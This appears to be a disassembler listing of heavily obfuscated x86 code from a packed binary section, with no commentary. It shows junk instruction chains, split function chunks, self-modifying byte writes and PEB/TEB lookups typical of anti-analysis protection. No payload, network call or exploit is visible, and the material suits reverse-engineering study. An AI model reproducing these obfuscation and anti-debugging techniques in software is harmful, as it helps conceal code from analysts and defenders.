; ---------------------------------------------------------------------------
dd 5FE90000h
db 32h, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_4895BF: ; CODE XREF: sub_489582+Cj
jmp loc_48CA41
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_4895C5: ; CODE XREF: sub_48A5BC+16j
xor ebp, 0D6FD6A90h
xchg eax, [esp+0Ch+var_C]
xchg ecx, [esp+0Ch+var_C]
mov eax, ecx
pop ecx
pop ebx
call sub_48BDC9
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A541
loc_4895DB: ; CODE XREF: sub_48A541+Aj
mov byte ptr [ebx], 87h
pop ebx
mov eax, offset loc_48863F
jmp loc_489DDE
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
db 9Dh, 87h, 34h
dd 199BE924h, 0
dd 0EE56840Fh, 6852FFFFh, 968AA0F7h, 0E9242C87h, 24FAh
db 0
; ---------------------------------------------------------------------------
loc_489609: ; CODE XREF: znnrn47v:loc_48B160j
sbb eax, ecx
jmp loc_48AA59
; ---------------------------------------------------------------------------
dd 0F71B0000h, 0FFE943E9h ; CODE XREF: znnrn47v:loc_48C7E9j
db 0FFh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48961B proc near ; CODE XREF: znnrn47v:loc_48A4B2j
; znnrn47v:loc_48D059p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0048B757 SIZE 00000010 BYTES
xchg ecx, [esp+0]
pop ecx
xchg edi, [esp-4+arg_0]
pop edi
push 74E653D0h
pop edx
jmp loc_48B757
sub_48961B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_48962E: ; CODE XREF: znnrn47v:0048A51Aj
mov byte ptr [ecx], 0Fh
pop ecx
add eax, 0E734AF47h
mov eax, [eax]
jmp loc_48B115
; ---------------------------------------------------------------------------
jnb loc_48C205
; =============== S U B R O U T I N E =======================================
sub_489645 proc near ; CODE XREF: znnrn47v:0048C43Ep
xchg eax, [esp+0]
xchg edx, [esp+0]
mov eax, edx
pop edx
jmp loc_48A669
sub_489645 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov byte ptr [edi], 9Ch
pop edi
xor eax, 57E9E7A9h
add eax, 41A371C1h
push edi
test eax, 0D2944A68h
mov ah, 5Fh
jmp loc_48D0E9
; ---------------------------------------------------------------------------
dd 5B241C87h, 4886D368h, 0E9ADE900h, 0FFFFh, 3C8700C3h
dd 68535F24h, 48BAD8h, 2BB5E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_489692: ; CODE XREF: sub_48A5BC:loc_489F49j
mov byte ptr [eax], 8Bh
pop eax
add edi, ebp
add edi, 0D260E043h
call near ptr 24851DE2h
jmp loc_48A776
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_4896A9 proc near ; CODE XREF: znnrn47v:00488EC4p
; FUNCTION CHUNK AT 0048955D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A823 SIZE 0000001D BYTES
xchg esi, [esp+0]
pop esi
push 8DDCC992h
mov [esp+0], cl
mov eax, ecx
jmp loc_48955D
sub_4896A9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0A3E99D00h, 0C3000008h, 6C870F00h, 0E9000009h, 0D08h
dd 17C7C100h, 286AEF81h, 0C781E062h, 76AAEC80h, 0A092F781h
dd 3C876AD1h, 0C015FF24h, 0E80045B0h, 0FFFFFBCFh, 850F0000h
dd 21F4h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_4896FE: ; CODE XREF: sub_48C14F-23C3j
jmp nullsub_597
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
pop ebx
sub ecx, 0C22B59B6h
xchg edi, [ebx]
push edi
jmp loc_48B8F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489CDA
loc_489712: ; CODE XREF: sub_489CDA-145Fj
call sub_48B39C
loc_489717: ; CODE XREF: znnrn47v:0048897Cj
and edx, 0B50B0581h
mov esi, eax
or ecx, eax
loc_489721: ; CODE XREF: znnrn47v:loc_488970j
add ecx, 4052A8AEh
popf
xchg ecx, [esp-4+arg_0]
jmp loc_488A43
; END OF FUNCTION CHUNK FOR sub_489CDA
; ---------------------------------------------------------------------------
dd 8704C2C1h, 0F6C3E93Ah, 0FFFFh, 0B1ADF081h, 0C881FBDBh
dd 1B91F044h, 0B37EF081h, 0C081A352h, 0A3BD5D15h, 65BE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48975A: ; CODE XREF: znnrn47v:00488F16j
push ebx
mov ebx, offset loc_48CA2A
jmp loc_48BCF2
; ---------------------------------------------------------------------------
jl loc_48BAF4
js locret_48AB74
rol edi, 5
cmp edi, 147DE1E4h
loc_48977A: ; CODE XREF: znnrn47v:loc_48BAA2j
jmp loc_4891F9
; ---------------------------------------------------------------------------
align 10h
dd 8D840F00h, 0FFFFF6h, 0EE38B0Fh, 0E99D0000h, 0FFFFF679h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489796: ; CODE XREF: znnrn47v:00488652j
push offset byte_48A5F5
jmp loc_4891D4
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4897A2 proc near ; CODE XREF: znnrn47v:004883A5p
; znnrn47v:0048C8FBj
xchg esi, [esp+0]
pop esi
pop edi
push 487BEFh
jmp nullsub_580
sub_4897A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 0F7h ; CODE XREF: znnrn47v:loc_48C3D4j
dd 800000C0h, 0E5CCE900h, 0FFFFh, 5E243487h, 1A8FC081h
dd 0D868ADCAh, 0E90048BCh, 24F7h, 0C7F70000h, 0F4F80F6Ch
dd 0FFF975E9h, 51C281FFh, 31E5795Ch, 0CAE8FCC0h, 0F000006h
dd 0EC283h, 0B2B85000h, 0E9004896h, 0AA7h, 59BDB81h, 34871A89h
dd 240C8724h, 5E59F18Bh, 0CE9008Bh, 16h
db 0
byte_489819 db 81h, 0C2h, 0A7h ; DATA XREF: sub_48C14F-9D5o
dd 0D18DA258h, 0E9241487h, 2C54h, 1908E8h
db 0
; ---------------------------------------------------------------------------
loc_48982D: ; CODE XREF: znnrn47v:0048A899j
jmp loc_489FCA
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48D039
loc_489834: ; CODE XREF: sub_48D039-1C7Dj
mov ebp, esp
push offset loc_489D29
jmp loc_48C576
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
dd 13C1C100h, 1C30DA81h, 3E92DFCh
db 0Dh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48984F: ; CODE XREF: znnrn47v:loc_489206j
jz loc_488ABC
jmp loc_48CAC8
; ---------------------------------------------------------------------------
dw 850Fh
dd 0FFFFF64Ch, 0FFEFB1E9h
db 0FFh
byte_489865 db 9, 0C0h, 0Fh ; DATA XREF: sub_48B1BE:loc_48BE87o
dd 160884h, 37B5E800h, 0F000000h, 35CC88h, 1404E900h, 68000000h
dd 568DAFA7h, 70F2815Ah, 0C1E0FAC4h, 0EA8116C2h, 437CA18Bh
dd 0FFEC1DE9h, 0C3C3FFh, 0B5B8B951h, 0A4E90048h, 1Bh, 487F6868h
dd 0E780E900h, 0C300FFFFh, 108B0000h, 125DE851h, 0
; ---------------------------------------------------------------------------
loc_4898C0: ; CODE XREF: znnrn47v:00488DD6j
push ebx
and edi, 9CD8E2BDh
jnz loc_48B1C9
loc_4898CD: ; CODE XREF: znnrn47v:0048C0B7j
jmp loc_48BB91
; ---------------------------------------------------------------------------
dw 8100h
dd 704943CFh, 8E0F5E4Dh, 0FFFFFDA5h, 7EDF81h, 0DEE9BCCDh
dd 18h
; ---------------------------------------------------------------------------
loc_4898EC: ; CODE XREF: znnrn47v:loc_48A6E3j
mov byte ptr [ebx], 5
pop ebx
mov ebx, eax
xchg ebx, [esp]
push 0DCF92BF1h
loc_4898FA: ; CODE XREF: znnrn47v:loc_48A3BAj
jmp loc_48BDEB
; ---------------------------------------------------------------------------
align 10h
locret_489900: ; CODE XREF: znnrn47v:0048916Cj
retn
; ---------------------------------------------------------------------------
align 2
dw 90E9h
dd 0FFFFE2h
db 0
; ---------------------------------------------------------------------------
loc_489909: ; DATA XREF: znnrn47v:00489168o
xchg edi, [esp]
push edi
pop ecx
jmp loc_48BA04
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_489913: ; CODE XREF: sub_48A5BC:loc_48A631j
; sub_48A5BC+8Aj
add eax, 0FE4F7E3Ah
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
mov eax, offset loc_48A986
jmp loc_48B167
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
align 2
locret_48992A: ; CODE XREF: znnrn47v:loc_48A703j
retn
; ---------------------------------------------------------------------------
align 4
mov edx, 5CAE5521h
jmp loc_48D021
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_489937: ; CODE XREF: znnrn47v:004894D2j
xchg esi, [esp]
pop esi
push eax
mov eax, ebp
call loc_489E2C
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_489945: ; CODE XREF: znnrn47v:00488927j
jmp near ptr dword_487ACC+0A7h
; ---------------------------------------------------------------------------
align 4
loc_48994C: ; CODE XREF: znnrn47v:00489019j
call sub_48D0F6
call sub_48B63C
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
loc_48995A: ; CODE XREF: znnrn47v:0048B671j
push 488048h
jmp loc_48B2E3
; ---------------------------------------------------------------------------
sub ebx, ebp
jmp sub_48C3C5
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A3D2
loc_48996D: ; CODE XREF: sub_48A3D2+16j
jmp loc_48CBB9
; END OF FUNCTION CHUNK FOR sub_48A3D2
; ---------------------------------------------------------------------------
dw 0C103h
dd 0FFF231E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_48997A proc near ; CODE XREF: znnrn47v:00487F0Fj
; sub_487FA1+32C3p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg esi, [esp-4+arg_0]
push offset word_48B3E6
jmp nullsub_567
sub_48997A endp
; ---------------------------------------------------------------------------
db 81h
dd 0D9C8C4E7h, 0DA850F38h, 0FFFFFDh
; ---------------------------------------------------------------------------
loc_489998: ; CODE XREF: znnrn47v:00488C5Aj
jmp loc_48CBDF
; ---------------------------------------------------------------------------
db 2 dup(0), 3Bh
dd 0FDBFE9F7h, 0FFFFh, 5B92DD81h, 800F6770h, 0FFFFE6DDh
dd 0FFF3CCE9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488669
loc_4899B9: ; CODE XREF: sub_488669:loc_48C2E9j
mov byte ptr [ebx], 9Ch
xchg ecx, [esp+4+var_4]
mov ebx, ecx
pop ecx
jmp loc_48BA39
; END OF FUNCTION CHUNK FOR sub_488669
; ---------------------------------------------------------------------------
xchg edx, [esp]
xchg edi, [esp]
mov edx, edi
pop edi
call sub_48BE1F
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_4899D5: ; CODE XREF: sub_48C14F:loc_48C895j
jl loc_48A488
add cl, ch
mov eax, large ds:33h
add [eax+5Bh], ch
push esi
xor [eax], ah
ror ecx, 10h
jmp loc_48A488
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_581. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn 20h
; ---------------------------------------------------------------------------
align 4
dd 0DC2CC181h, 84680C39h, 0E90048A1h, 0FFFFEDD3h, 8703C600h
dd 0E9535A5Bh, 1245h, 0A4860F00h, 81FFFFEAh, 0E7F875D9h
dd 0FFA1E985h, 0F00FFFFh, 2E0781h, 2E81E900h, 0
dd 2414879Dh, 3DAE85Ah
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489F66
loc_489A3F: ; CODE XREF: sub_489F66+23j
add esi, 0DF2699EEh
popf
xchg esi, [esp-4+arg_0]
jmp sub_48A71A
; END OF FUNCTION CHUNK FOR sub_489F66
; ---------------------------------------------------------------------------
push offset loc_48A70D
jmp locret_489593
; ---------------------------------------------------------------------------
dd 3C870000h, 9F006824h, 2AE90048h, 0FFFFE0h
db 0
byte_489A69 db 51h, 0B9h, 0AFh ; DATA XREF: sub_48942C+Ao
dd 0E90048BBh, 0FFFFF0CAh, 5F9D07C6h, 0FFE3E3E8h
; CODE XREF: znnrn47v:0048B022j
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_489A7F: ; CODE XREF: znnrn47v:loc_48904Fj
mov byte ptr [edi], 3
xchg eax, [esp]
mov edi, eax
pop eax
push offset dword_48CAA4
jmp loc_48A703
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_489135
loc_489A94: ; CODE XREF: sub_489135+1CAFj
pushf
jmp loc_48A218
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
align 4
test edi, 7D8FE7F0h
jmp loc_48CB64
; ---------------------------------------------------------------------------
align 4
add ebx, 7F4054BEh
popf
xchg ebx, [esp]
retn
; ---------------------------------------------------------------------------
align 4
dd 1A1CE800h, 0F000000h, 102986h, 17CF8100h, 8159120Ah
dd 323A87C7h, 0D5F781D0h, 0E9552505h, 35A4h
db 0, 3, 0E8h
; ---------------------------------------------------------------------------
loc_489ADB: ; CODE XREF: znnrn47v:loc_48B95Ej
rol eax, 13h
xor eax, 0D4C1D6B6h
call sub_48B6E8
add cl, ch ; CODE XREF: sub_48C14F+4CBj
or esi, esi
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
dd 0FFE0E0E9h, 0C8700FFh, 2679E924h, 2C680000h, 0E90048A4h
dd 0FFFFF6ADh
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_585. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 0EFA8E900h, 0C100FFFFh, 34871FEAh, 34875E24h, 0CBE95E24h
dd 20h
; ---------------------------------------------------------------------------
loc_489B24: ; CODE XREF: znnrn47v:loc_48C4C0j
jb loc_488303
loc_489B2A: ; CODE XREF: znnrn47v:loc_48B724j
mov eax, large fs:30h
push edi
mov edi, offset dword_48CF9C
jmp loc_48904F
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_605. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp locret_48ADCB
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_489B45: ; DATA XREF: sub_489E18+8o
push (offset loc_48C931+1)
jmp loc_48BD10
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_479. PRESS KEYPAD "+" TO EXPAND]
dd 0FEBF5700h, 0E90048A8h, 1A75h, 0E8810000h, 59A3BDC9h
dd 0F081C0D1h, 339D4B24h, 0FFE367E8h, 19E900FFh, 87000018h
dd 0A95B241Ch, 70h, 1798840Fh, 0CD680000h, 586170F5h, 0E012E081h
dd 0F0811099h, 10E062h, 1C7BE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489B9E: ; CODE XREF: znnrn47v:loc_4890CFj
mov byte ptr [eax], 87h
xchg ecx, [esp]
mov eax, ecx
pop ecx
push edi
push 2D778D5h
pop edi
rol edi, 18h
jmp loc_4889D8
; ---------------------------------------------------------------------------
dw 5600h
; ---------------------------------------------------------------------------
mov esi, offset loc_489E8D
jmp loc_48C8DD
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_489BC4: ; CODE XREF: sub_48C14F+ADj
xchg edx, [esp+10h+var_10]
pop edx
push ecx
push 964F35EAh
pop ecx
and ecx, 0D05E4A31h
jmp loc_48847F
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dw 5B00h
; ---------------------------------------------------------------------------
rol edi, 1
xor edi, 0A15473CDh
test edi, 400h
jmp loc_48CD52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_575. PRESS KEYPAD "+" TO EXPAND]
dd 287EE900h, 0E9000000h, 0FFFFE35Eh, 0CD8700C3h, 2BF9E9h
dd 241C8700h, 6C3815Bh, 3151432h, 0C6E768C3h, 70E90048h
dd 0FFFFDEh
dword_489C1C dd 0B9162468h, 0CA815A3Ah, 4417942Dh, 0A2CC6857h, 18E9F861h
; DATA XREF: sub_48BE1F+5o
dd 0FFFFE7h, 482C6800h, 815983C7h, 0B6D3F1C9h, 29F981A2h
dd 0E9FF2F66h, 0FFFFF8EDh, 13890000h
; =============== S U B R O U T I N E =======================================
sub_489C50 proc near ; CODE XREF: sub_48C11B:loc_48BA83p
; FUNCTION CHUNK AT 00489049 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
pushf
jmp loc_489049
sub_489C50 endp
; ---------------------------------------------------------------------------
popf
xchg edi, [esp]
pop edi
mov byte ptr [ecx], 8Dh
pop ecx
mov esi, ebp
xchg esi, [esp]
mov ebp, esp
jmp loc_48C1DC
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_489C71: ; CODE XREF: znnrn47v:loc_48D046j
push 488AFAh
jmp loc_48CC87
; ---------------------------------------------------------------------------
align 4
add ecx, 8BC92CBDh
mov cl, al
pop ecx
mov eax, [eax]
jmp loc_48BD15
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48930E
loc_489C8D: ; CODE XREF: sub_48930E:loc_48D082j
add esi, 49158Fh
jmp loc_48BAEC
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_489C99: ; CODE XREF: znnrn47v:00487FEDj
popf
mov ecx, [ecx]
call loc_48D059
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 3321h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489CAA: ; DATA XREF: znnrn47v:loc_489F4Fo
push esi
push 0F1A01E34h
pop esi
rol esi, 1Ch
add esi, 0D87A8AD3h
sub esi, 0AF4C17DCh
jmp loc_48B98E
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_604. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_489CC7: ; DATA XREF: sub_48A0DE+5o
xchg edi, [esp]
push ebx
mov ebx, offset loc_48C2F1
jmp loc_48AB77
; ---------------------------------------------------------------------------
db 2 dup(0), 0C1h
db 0CAh, 0Dh
; =============== S U B R O U T I N E =======================================
sub_489CDA proc near ; CODE XREF: znnrn47v:004891BDp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00488873 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00488A43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489712 SIZE 0000001E BYTES
xchg eax, [esp-4+arg_0]
xchg ecx, [esp-4+arg_0]
mov eax, ecx
pop ecx
push edi
mov edi, esi
jmp loc_488873
sub_489CDA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 87h ; ‡
db 14h
db 24h ; $
db 5Ah ; Z
db 53h ; S
db 68h ; h
db 92h ; ’
db 0BAh ; º
db 0C5h ; Å
db 0E4h ; ä
db 5Bh ; [
db 81h ;
db 0E3h ; ã
db 92h ; ’
db 20h
db 39h ; 9
db 0D1h ; Ñ
db 0E9h ; é
db 0C7h ; Ç
db 0Ch
db 0
db 0
db 68h
dd 73E2B392h, 58240487h, 0FFDE6EE8h, 1509E9FFh, 0
dword_489D18 dd 873103C6h, 0DF8B243Ch, 0E9D18B5Fh, 0FFFFF398h
; DATA XREF: sub_488B8D:loc_48D0BBo
db 0
; ---------------------------------------------------------------------------
loc_489D29: ; DATA XREF: sub_48D039-3803o
push esi
push offset sub_48B41C
jmp loc_48D077
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_614. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 0F868CD03h, 0E9004899h, 0FFFFFEB8h, 0FF81B00h, 2CE68Ch
dd 0F140E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487FA1
loc_489D52: ; CODE XREF: sub_487FA1+446Bj
cmp esi, edi
jmp loc_48B252
; END OF FUNCTION CHUNK FOR sub_487FA1
; ---------------------------------------------------------------------------
align 2
dw 0C081h
dd 1B3E9A47h, 59240C87h, 68240C87h, 48B576h, 0FFDD6DE9h
dd 48700FFh, 0BF575824h, 48AEC4h, 0C64E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_489D83: ; CODE XREF: sub_48C14F+686j
mov byte ptr [edi], 3
pop edi
push offset loc_488E78
jmp loc_4896FE
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_48CA24
loc_489D92: ; CODE XREF: sub_48CA24+3F4j
and ecx, 0CD30CDE8h
xor ecx, 56125190h
push offset byte_48C61F
jmp loc_489EF3
; END OF FUNCTION CHUNK FOR sub_48CA24
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_489DA9: ; CODE XREF: sub_489135-8F7j
jz loc_48C222
jmp loc_48A227
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
dd 588700C6h, 261FF681h, 34821C9Eh, 87840F24h, 53000011h
dd 48AF3EBBh, 0ED84E900h, 0FFFFh, 6CE900C3h, 0FFFFF0h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_572. PRESS KEYPAD "+" TO EXPAND]
align 2
; START OF FUNCTION CHUNK FOR sub_48A541
loc_489DDE: ; CODE XREF: sub_48A541-F5Dj
jmp loc_48BF08
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
db 81h
dd 4D52FCEEh, 0C1CE2B78h, 0C2810ACFh, 5612AD11h, 1A6D850Fh
dd 0C1000000h, 54E908CFh, 8700001Ah, 32B8240Ch, 0E900488Eh
dd 0FFFFF018h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489E12: ; CODE XREF: znnrn47v:00488A8Ej
jns near ptr dword_4882DC+0Fh
; =============== S U B R O U T I N E =======================================
sub_489E18 proc near
; FUNCTION CHUNK AT 0048BA94 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [ecx], 0Fh
pop ecx
push offset loc_489B45
jmp loc_48BA94
sub_489E18 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_489E2C: ; CODE XREF: znnrn47v:0048993Ep
; sub_48A5BC+B7j
xchg edx, [esp]
pop edx
xchg eax, [esp]
fldlg2
push esi
mov esi, ecx
xchg esi, [esp]
call sub_48A920
; ---------------------------------------------------------------------------
dd 0C6C10000h, 0B5F68107h, 872AA20Bh, 0E3682434h, 0E900489Fh
; CODE XREF: znnrn47v:loc_48B931j
dd 0FFFFF11Fh, 8100C300h, 0BA7FA6DDh, 2100E95Ah, 0C3000000h
dd 48CA8B68h, 1F72E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489E72: ; CODE XREF: znnrn47v:0048C8E5j
and edi, 60A46696h
or edi, 0DB2FC65Ch
sub edi, 0F982A786h
xor edi, 1AD3ED7h
in eax, 0C7h ; DMA controller, 8237A-5.
; channel 3 current word count
pop edi
loc_489E8D: ; DATA XREF: znnrn47v:00489BB8o
xchg eax, edx
test ds:57000026h, ch
jmp loc_48B01D
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489E9B: ; CODE XREF: znnrn47v:0048A75Fj
xchg esi, [esp]
pop esi
mov eax, large fs:18h
add eax, 0D4438403h
push (offset loc_48B8FD+1)
jmp loc_48ADCE
; ---------------------------------------------------------------------------
align 4
locret_489EB8: ; CODE XREF: znnrn47v:loc_488BF9j
retn
; ---------------------------------------------------------------------------
xchg eax, [esp]
pop eax
js loc_48C926
jno loc_4887B1
lodsb
add edx, eax
rol edx, 3
jmp loc_488C69
; ---------------------------------------------------------------------------
dd 0DBBDE99Dh, 0FFFFh, 0F0000C3h, 0FFF98E82h, 0E3FEE9FFh
dd 0F00FFFFh, 2DCC85h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48CA24
loc_489EF3: ; CODE XREF: sub_48CA24-2C81j
jmp near ptr dword_487CA0+34h
; END OF FUNCTION CHUNK FOR sub_48CA24
; ---------------------------------------------------------------------------
popf
jmp loc_48CCB4
; ---------------------------------------------------------------------------
align 10h
push edi
push 0D6ACF354h
pop edi
and edi, 39A923C1h
sub edi, 0BC73CA4Bh
or edi, 2163AD87h
jmp loc_48B2B1
; ---------------------------------------------------------------------------
dw 0F00h
; ---------------------------------------------------------------------------
test [ebx-78FFFFF4h], edi
sbb al, 24h
xchg ebp, [esp]
mov ebx, ebp
pop ebp
mov byte ptr [ebx], 9Dh
pop ebx
jmp loc_48BF9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48AC88
loc_489F37: ; CODE XREF: sub_48AC88:loc_48C7F8j
pop edi
add edi, 781F7263h
sub edi, 0B073EDB4h
call sub_48B35E
; END OF FUNCTION CHUNK FOR sub_48AC88
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_489F49: ; CODE XREF: sub_48A5BC+113j
jmp loc_489692
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_489F4F: ; CODE XREF: znnrn47v:loc_48B09Fj
push offset loc_489CAA
jmp loc_488FDF
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFFD2489h
db 0FFh
; ---------------------------------------------------------------------------
loc_489F61: ; CODE XREF: znnrn47v:loc_48D087j
call sub_48C59A
; =============== S U B R O U T I N E =======================================
sub_489F66 proc near ; CODE XREF: znnrn47v:loc_48CCF7p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00489A3F SIZE 0000000F BYTES
call sub_48A505
push 0A99DE76Ch
pop esi
add esi, 8CDD1854h
or esi, 0AC3C8339h
sub esi, 5B5C0F07h
and esi, 39620868h
jmp loc_489A3F
sub_489F66 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
loc_489F90: ; CODE XREF: znnrn47v:loc_4889D8j
xor edi, 9B3C48C9h
add edi, 0B209FFF5h
loc_489F9C: ; DATA XREF: znnrn47v:00487AB4o
jnb short loc_489FDA
and al, 0E9h
xchg al, [eax]
; ---------------------------------------------------------------------------
dw 0
dd 41E80000h, 0FFFFE8h, 2213E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_489FB2: ; CODE XREF: sub_489582:loc_48A347j
sub eax, 2A3860FFh
or eax, 0EDC393D3h
push offset sub_488669
jmp near ptr dword_487FFC+31h
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489FCA: ; CODE XREF: znnrn47v:loc_48982Dj
mov byte ptr [edi], 9Ch
pop edi
push offset dword_48B058
jmp locret_488B73
; ---------------------------------------------------------------------------
db 0C1h, 0CEh
; ---------------------------------------------------------------------------
loc_489FDA: ; CODE XREF: znnrn47v:loc_489F9Cj
add esp, [ebx]
fsubp st(1), st
nop
std
; ---------------------------------------------------------------------------
dd 0FF00FFFFh, 45B0C015h, 0E8A1E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_489FEE: ; CODE XREF: znnrn47v:0048C7A9j
call sub_488D38
loc_489FF3: ; CODE XREF: znnrn47v:0048C371j
jmp locret_48D060
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 50h ; CODE XREF: sub_48B8DD:loc_48A85Fj
dd 6F0FB868h, 0C0815887h, 92F35F6Bh, 0FFFAE3E9h, 95C881FFh
dd 0E9266540h, 23D2h, 0BD57D281h, 32E9E574h, 0FFFFE9h
dd 0CC259h
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_593. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1C778752h
pop edi
jmp loc_48C1E9
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48A037: ; CODE XREF: znnrn47v:loc_48B5C5j
push 0DF5A239Ah
pop esi
xor esi, 108734EAh
sub esi, 2949FC23h
push 488317h
jmp locret_488881
; ---------------------------------------------------------------------------
align 4
loc_48A054: ; CODE XREF: znnrn47v:loc_48AD03j
test ecx, edi
pop edi
jmp loc_488517
; ---------------------------------------------------------------------------
